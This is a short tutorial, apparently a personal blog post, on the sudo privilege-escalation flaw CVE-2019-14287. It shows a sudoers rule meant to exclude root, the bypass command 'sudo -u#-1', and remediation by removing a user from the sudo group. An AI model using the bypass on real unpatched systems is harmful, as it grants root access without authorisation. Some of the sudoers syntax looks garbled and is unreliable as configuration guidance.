CVE-2019-14287 - Linux sudo escalation of privileges
Create User and make sure they're able to login
Setup for login and execute tasks:
First you would have created a user:
useradd -m bob -G sudo -s /bin/bash
passwd bob
Being able to login you add to .profile (on top)
vi .profile
PATH=/usr/sbin:$PATH
check who's in sudo with:
groups sudo
groups bob
Edit the file sudoers
vi /etc/sudoers
Because bob is member of sudo he can perform Administrative tasks.
2. Prevent partially user privilege specification
This doesn't help too much because of the flaw.
myhost operators =(ALL,!root) !ALL
To check which user executes this:
sudo -u#-1 id 0
To execute a command as root:
su root leafpad
cannot be executed because of that rule.
or with the user password it can be executed like this:
sudo -u#-1 leafpad
3. Remediation and Check Group Membership
You could add another line like this:
%sudo ALL=(ALL:!operator) !ALL
The result is, that Bob cannot perform Administrative tasks anymore.
Resolution
But to not use this strange setup as all, you just need to make sure Bob doesn't have sudo rights.
groups root
groups bob
Set default group for Bob
sudo usermod -a -G operator bob
groups bob
gpasswd -d bob sudo
groups bob
Result: Bob is no longer a member of sudo and cannot perform Administrative tasks and is just an operator.
Hardened Execuction - Least privilged
As you can see it's wizer to not give the users sudo rights.
And this is history when you update your Linux system.
Thank you for reading.
Martijn